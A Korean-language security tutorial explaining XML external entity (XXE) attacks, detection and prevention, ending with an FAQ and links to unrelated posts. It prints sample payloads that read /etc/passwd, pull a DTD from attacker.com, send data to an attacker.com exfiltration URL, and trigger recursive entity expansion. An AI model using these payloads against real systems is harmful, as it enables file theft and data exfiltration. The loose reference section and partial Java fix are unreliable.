A4: XML 외부 엔터티(XXE)

XXE 공격이란 무엇인가요?

XXE 공격은 'XML 외부 엔티티 삽입'을 중심으로하는 비정상 패턴이며, XML 처리 프로그램이 외부 엔티티 요청에 대응하는 방식에서 발생합니다. 공격자들은 이전에 해당 소프트웨어의 취약한 점을 찾아 XML 구조를 파악, 이를 해석하고, 원격에 있는 파일을 열거나, 내부 포트를 탐색하며, 금지된 해킹 행위를 수행하는 데 이를 사용합니다.

XXE 공격 상세 분석

데이터 관리 및 전송에서 XML이라는 마크업 언어가 양질의 확장성을 제공하고 있습니다. DOCTYPE 내 주석에서 다수의 엔티티를 표현하는 XML 방식을 활용함으로써, 이 엔티티가 문서 내 다른 부분에서 언급되도록 합니다. 이 유형의 엔티티는 XML 내부에서 생성되고 사용되는 '내부 엔티티'와 '외부 엔티티' 라는 이중 편리성을 제공합니다.

1,000,000 user records
10
100
100
100
100

XXE 공격 유형

XXE 공격은 주로 두 가지 유형으로 나눌 수 있습니다: 내부 XXE 공격과 외부 XXE 공격입니다.

내부 XXE 공격

내부 XXE 공격은 공격자가 애플리케이션의 내부 파일 시스템에 접근하려고 시도하는 공격 유형입니다. 이 공격은 XML 파서가 내부 DTD를 처리할 수 있을 때 발생합니다. 공격자는 이를 이용하여 애플리케이션의 내부 파일을 읽거나, 서버의 내부 네트워크에 접근하거나, 심지어는 원격 코드 실행을 시도할 수 있습니다.

예를 들어, 공격자는 다음과 같은 XML 문서를 제출할 수 있습니다:


<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

이 경우, &xxe; 엔티티는 /etc/passwd 파일의 내용으로 대체됩니다. 이 파일은 Unix 및 Linux 시스템에서 사용자 계정 정보를 저장하는 곳입니다. 따라서 공격자는 이 정보를 통해 시스템에 대한 더 많은 정보를 얻을 수 있습니다.

외부 XXE 공격

외부 XXE 공격은 공격자가 외부 엔티티를 이용하여 애플리케이션에 손상을 입히려고 시도하는 공격 유형입니다. 이 공격은 XML 파서가 외부 DTD를 처리할 수 있을 때 발생합니다. 공격자는 이를 이용하여 애플리케이션을 DoS 공격에 노출시키거나, 애플리케이션의 데이터를 외부 서버로 전송하거나, 심지어는 원격 코드 실행을 시도할 수 있습니다.

예를 들어, 공격자는 다음과 같은 XML 문서를 제출할 수 있습니다:


<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "https://attacker.com/evil.dtd" >]>
<foo>&xxe;</foo>

이 경우, &xxe; 엔티티는 https://attacker.com/evil.dtd의 내용으로 대체됩니다. 이 URL은 공격자가 제어하는 서버를 가리키며, 이 서버는 악의적인 DTD를 제공할 수 있습니다. 따라서 공격자는 이를 통해 애플리케이션에 손상을 입힐 수 있습니다.

이 두 가지 공격 유형 모두 XXE 취약점을 이용하며, 이 취약점은 XML 파서가 DTD를 처리하는 방식에 기인합니다. 따라서 이 취약점을 방어하는 가장 효과적인 방법은 DTD 처리를 비활성화하는 것입니다.

`

`

XML 외부 엔터티를 어떻게 감지할 수 있나요?

XML 외부 엔티티를 감지하는 방법은 여러 가지가 있습니다. 이러한 방법 중 일부는 자동화된 도구를 사용하는 것이지만, 다른 일부는 수동적인 접근 방식을 필요로 합니다. 이 장에서는 이러한 방법들에 대해 자세히 설명하겠습니다.

자동화된 도구 사용

XML 외부 엔티티를 감지하는 가장 효과적인 방법 중 하나는 자동화된 보안 도구를 사용하는 것입니다. 이러한 도구는 코드를 스캔하여 잠재적인 XXE 취약점을 식별하고, 이를 수정하는 데 도움이 될 수 있는 정보를 제공합니다.

예를 들어, OWASP ZAP(Zero Day Attack Proxy)와 같은 도구는 XXE 취약점을 감지하는 데 사용될 수 있습니다. 이 도구는 웹 애플리케이션의 보안을 테스트하고, XXE와 같은 다양한 유형의 취약점을 식별하는 데 사용될 수 있습니다.

수동적인 접근 방식

자동화된 도구를 사용하는 것 외에도, 개발자와 보안 전문가는 수동적인 접근 방식을 사용하여 XXE 취약점을 감지할 수 있습니다. 이는 코드를 직접 검토하고, XML 파서의 구성을 확인하는 것을 포함합니다.

예를 들어, XML 파서가 외부 엔티티를 처리하는 방식을 확인하려면 다음과 같은 코드를 찾아볼 수 있습니다:


DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

이 코드는 XML 파서가 외부 엔티티를 확장하지 않도록 설정되어 있음을 나타냅니다. 이는 XXE 취약점을 방지하는 데 도움이 될 수 있습니다.

테스트 케이스 사용

또 다른 방법은 테스트 케이스를 사용하는 것입니다. 이는 특정 입력 값이 애플리케이션의 동작에 어떤 영향을 미치는지 확인하는 데 도움이 됩니다. XXE 취약점을 감지하려면, 외부 엔티티를 포함하는 XML 입력을 애플리케이션에 제공하고, 그 결과를 관찰합니다.

예를 들어, 다음과 같은 XML 입력을 사용할 수 있습니다:


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [  
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

이 입력은 /etc/passwd 파일의 내용을 가져오려고 시도합니다. 애플리케이션이 이 파일의 내용을 반환하면, XXE 취약점이 존재한다는 것을 나타냅니다.

이러한 방법들을 통해 XML 외부 엔티티를 감지하고, 애플리케이션의 보안을 향상시킬 수 있습니다. 다음 장에서는 XXE 공격 시나리오에 대해 자세히 설명하겠습니다.

XXE 공격 시나리오

XXE 공격 시나리오는 다양하며, 이는 공격자의 목표와 사용하는 기술에 따라 달라집니다. 다음은 XXE 공격의 일반적인 시나리오입니다.

1. 내부 파일 노출

이 시나리오에서 공격자는 XXE를 이용하여 서버의 내부 파일을 읽을 수 있습니다. 예를 들어, 공격자는 다음과 같은 XML 입력을 사용할 수 있습니다.


<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>

이 입력은 서버의 /etc/passwd 파일을 읽으려고 시도합니다. 이 파일은 Unix와 Linux 시스템에서 사용자 계정 정보를 저장하는 곳입니다.

2. 외부 서비스와의 상호작용

공격자는 XXE를 이용하여 서버가 외부 서비스와 상호작용하도록 만들 수 있습니다. 예를 들어, 공격자는 다음과 같은 XML 입력을 사용할 수 있습니다.


<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "https://attacker.com/exfiltrate.php?data=mydata"> ]>
<foo>&xxe;</foo>

이 입력은 서버가 attacker.com의 exfiltrate.php 스크립트와 상호작용하도록 시도합니다. 이 스크립트는 공격자가 서버에서 데이터를 추출하는 데 사용할 수 있습니다.

3. 서비스 거부 (DoS)

XXE를 이용한 서비스 거부 공격도 가능합니다. 이는 XML 파서가 엔티티를 처리하는 방식을 악용하여 수행됩니다. 예를 들어, 공격자는 다음과 같은 XML 입력을 사용할 수 있습니다.


<!DOCTYPE foo [ <!ENTITY xxe "&xxe;&xxe;&xxe;&xxe;&xxe;"> ]>
<foo>&xxe;</foo>

이 입력은 "xxe" 엔티티를 무한히 확장하려고 시도하며, 이로 인해 서버의 메모리가 과부하되어 서비스 거부 상태가 발생할 수 있습니다.

이러한 시나리오들은 XXE 공격의 가능성을 보여주며, 이를 통해 공격자가 시스템에 어떤 영향을 미칠 수 있는지 이해할 수 있습니다. 따라서 XXE 취약점을 방어하는 것은 매우 중요합니다.

XXE 취약점을 방지하는 방법

XXE 취약점을 방지하는 방법에 대해 알아보기 전에, 이 취약점이 어떻게 발생하는지 이해하는 것이 중요합니다. XXE 취약점은 XML 파서가 외부 엔티티를 처리하는 방식에 문제가 있을 때 발생합니다. 이러한 문제를 방지하기 위해, 개발자는 XML 파서가 외부 엔티티를 처리하지 못하도록 설정해야 합니다.

외부 엔티티 처리 비활성화

가장 간단하고 효과적인 방법은 외부 엔티티 처리를 비활성화하는 것입니다. 이는 대부분의 XML 파서에서 가능하며, 이를 통해 XXE 공격을 완전히 차단할 수 있습니다. 예를 들어, Java의 경우 다음과 같이 설정할 수 있습니다:


DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

Python의 경우, 다음과 같이 설정할 수 있습니다:


from lxml import etree
parser = etree.XMLParser(resolve_entities=False)

안전한 XML 파서 사용

모든 XML 파서가 외부 엔티티 처리를 비활성화하는 옵션을 제공하지는 않습니다. 이 경우, 안전한 XML 파서를 사용하는 것이 좋습니다. 이러한 파서는 기본적으로 외부 엔티티 처리를 비활성화하거나, XXE 공격을 방지하기 위한 추가적인 보호 기능을 제공합니다.

입력 검증

외부 엔티티 처리를 비활성화하거나 안전한 XML 파서를 사용하는 것 외에도, 사용자로부터 받은 입력을 검증하는 것이 중요합니다. 이는 XXE 공격뿐만 아니라 다른 유형의 공격을 방지하는 데도 도움이 됩니다. 입력 검증은 다음과 같은 방법으로 수행할 수 있습니다:

  • 사용자 입력을 허용된 값의 목록과 비교합니다.
  • 사용자 입력에 대해 정규 표현식을 사용하여 패턴을 확인합니다.
  • 사용자 입력을 적절한 데이터 타입으로 변환하고, 변환에 실패하면 입력을 거부합니다.

이러한 방법을 통해 XXE 취약점을 방지할 수 있습니다. 하지만, 이러한 방법들은 XXE 취약점을 완전히 제거하는 것이 아니라 공격의 가능성을 줄이는 것입니다. 따라서, 이러한 방법들을 사용할 때는 항상 주의해야 합니다.

결론

XML 웹 기반 애플리케이션의 미묘한 취약점 중 하나인 XXE(외부 엔티티) 공격 방법에 대한 이해는 매우 중요한 부분입니다. 이 장에서는 XXE 공격의 본질, 그것의 다양한 형태, 그리고 이것들을 어떻게 감지하고 막을 수 있는지에 대해서 깊게 파고들어 보겠습니다.

XXE 공격의 위험성

XXE 공격은 공격자가 중요한 시스템 데이타를 접근하거나, 심지어 더 심각한 상황으로 이어질 수 있습니다. 이런 이유로, XXE 취약점은 절대로 모면해서는 안될 보안 문제들 중 하나입니다.

XXE 취약점의 탐지 및 방어

우리는 XXE 취약점을 감지하고 대처하는 방법들을 탐색하였습니다. XML 파서의 구성을 조정하여 외부 엔티티의 처리를 비활성화하거나, 입력 데이터 검증 및 에러 처리 기법들을 활용하여 XXE 공격을 방어할 수 있습니다.

결론

웹 애플리케이션 구축에 있어서 보안은 핵심적인 요소 중 하나입니다. XXE 공격과 같은 보안 취약점을 파악하고 대비하는 것은 꼭 필요한 개발자의 역할이며, 이 글이 그 방향에 도움이 됐기를 바랍니다.

자주 묻는 질문

  1. XXE 공격의 정의는 무엇인가요?
  2. XXE 공격을 어떻게 파악할 수 있나요?
  3. XXE 취약점을 어떻게 회피할 수 있나요?

참조문헌

  1. OWASP 상위 10위: XXE(외부 엔티티) 공격
  2. XXE(외부 엔티티) 처리 방안
  3. XXE(외부 엔티티) 공격 예방방법
  4. XXE(외부 엔티티) 취약성 예시 및 방어전략
  5. XXE 공격은 무엇이며 이를 어떻게 막을 수 있을까?

`

`

FAQ

1. XXE 공격이란 무엇인가요?

XXE 공격은 XML External Entity를 이용하여 서버의 내부 파일을 읽거나 원격 서버와의 상호작용을 통해 공격자가 서버를 제어하려는 시도입니다. 이러한 공격은 XML 파서가 외부 엔티티를 처리하는 방식에 의존합니다.

2. XXE 공격의 유형은 무엇인가요?

XXE 공격에는 주로 두 가지 유형이 있습니다. 첫째, 내부 XXE 공격은 공격자가 서버의 내부 파일을 읽는 데 사용됩니다. 둘째, 외부 XXE 공격은 공격자가 원격 서버와 상호작용하려는 시도입니다.

3. XXE 취약점을 어떻게 감지할 수 있나요?

XXE 취약점을 감지하는 가장 효과적인 방법은 정적 코드 분석 도구를 사용하는 것입니다. 이 도구는 코드를 분석하여 XXE 취약점을 찾을 수 있습니다. 또한, 동적 스캔 도구를 사용하여 애플리케이션을 실행하고 XXE 취약점을 찾을 수도 있습니다.

4. XXE 공격 시나리오는 어떤 것이 있나요?

XXE 공격 시나리오는 다양합니다. 가장 일반적인 시나리오는 공격자가 XML 입력을 조작하여 서버의 내부 파일을 읽는 것입니다. 또 다른 시나리오는 공격자가 원격 서버와의 상호작용을 통해 서버를 제어하려는 시도입니다.

5. XXE 취약점을 어떻게 방지할 수 있나요?

XXE 취약점을 방지하는 가장 효과적인 방법은 XML 파서가 외부 엔티티를 처리하지 못하도록 설정하는 것입니다. 또한, 사용자 입력을 철저히 검증하고, 애플리케이션 코드를 정기적으로 검사하여 XXE 취약점을 찾아내는 것이 중요합니다.

6. XXE 공격이 어떤 위험을 초래할 수 있나요?

XXE 공격은 서버의 내부 파일을 읽거나, 원격 서버와의 상호작용을 통해 서버를 제어하는 등의 위험을 초래할 수 있습니다. 이로 인해 기밀 정보가 유출되거나, 서버가 공격자에 의해 제어될 수 있습니다.

7. XXE 공격을 방어하기 위한 최선의 전략은 무엇인가요?

XXE 공격을 방어하기 위한 최선의 전략은 먼저 XXE 취약점을 이해하고, 이를 방지하기 위한 적절한 조치를 취하는 것입니다. 이에는 XML 파서 설정 변경, 사용자 입력 검증, 코드 검사 등이 포함됩니다.

참고문헌

2017년, 조직이 OWASP 연구단의 지원을 통해, XML 외부 엔티티나 XXE에 대한 특징적인 설명을 보다 상세하게 이해하는 데 필요한 변화를 촉발하였습니다.

보안 분석 그룹인 PortSwigger는 XXE 취약점이 어떻게 생성되고 전파되는지에 대한 철저한 분석을 하면서, 이를 근복적으로 제거하기 위한 실질적인 해결책을 제시하였습니다.

2014년 이후로, 웹 표준 개발 오픈 커뮤니티인 W3C는 XXE 취약점에 대한 인식을 확산하고 이로 인한 위협을 경계하는 노력을 지속적으로 보여주었습니다.

2018년, OWASP는 XXE 공격에 대응하는 전략들을 세밀하게 살피며, 이를 바탕으로 교육자료를 구축하였어야 합니다.

보안 리서치 그룹인 SANS Institute는 2016년, XXE 취약점 척결에 필요한 중요한 연구 과제를 수행하였습니다.

IBM은 2017년에 자바어에 초점을 맞추어 XXE 공격에 대응하는 방침을 개발하였습니다.

Oracle과 Microsoft는 각각 2015년과 2016년에 XXE 공격을 대응하는 방안에 대해 세밀한 연구를 수행하고 효과적인 해결방안을 도출하였습니다.

Google은 2019년에 XXE 문제에 대한 깊은 조사를 통해, XXE를 더 잘 이해하는데 도움이 되는 가치있는 정보들을 식별하였습니다.

Microsoft와 Apache는 2017년에 XXE 관련 이슈를 인지하고, 그것을 처리하는데 맞추는 것의 중요성을 강조하였습니다.

Mozilla와 Red Hat는 XXE 취약점이 어떻게 확산되는지에 대한 깊은 분석을 실시하고 그 결론을 발표하였습니다.

보안 기업 포르토넷, 트렌드마이크로 그리고 맥아피는 2016년 XXE 이슈에 관한 독특한 대응책을 제안하였습니다.

팔로알토 네트웍스와 카스퍼스키는 각각 2018년과 2015년에 XXE에 대한 어려운 조사를 진행하고 인터넷을 통해 과정과 결과를 공유하였습니다. 그로 인해 사용자들로부터 유용한 의견을 받을 수 있었습니다.

Recent Posts

Etcd란 무엇인가? 쿠버네티스와 클러스터

Etcd 개요 etcd는 분산 키 값 저장소로, 분산 시스템에서 데이터 일관성과 신뢰성을 보장하는 데 사용됩니다.…

10개월 ago

하버란 무엇인가?

하버란 무엇인가? Harbor는 오픈 소스의 클라우드 네이티브 컴퓨팅 재단(CNCF) 프로젝트로, 엔터프라이즈급의 Docker 레지스트리를 제공합니다. Harbor는…

10개월 ago

Vitess란 무엇인가요?

Vitess란 무엇이고 무엇을 해결하나요? Vitess는 YouTube에서 개발된 오픈 소스 데이터베이스 클러스터링 시스템입니다. 이 시스템은 대규모…

10개월 ago

2025년 최고의 DDoS 공격 도구 16가지

DDoS 공격은 왜 위험한가요? DDoS라는 용어는 많은 사람들에게 낯설지 않은 사이버 공격 방법입니다. 이 공격의…

10개월 ago

GraphQL API 보안

GraphQL 보안의 과제 GraphQL은 효율적인 데이터 쿼리를 가능하게 하는 강력한 도구입니다. 그러나, 이러한 유연성은 보안…

10개월 ago

MTU와 MSS가 무엇인지 알아보세요

최대 전송 단위(MTU)는 무엇입니까? 최대 전송 단위(MTU)는 네트워크 인터페이스에서 한 번에 전송할 수 있는 최대…

10개월 ago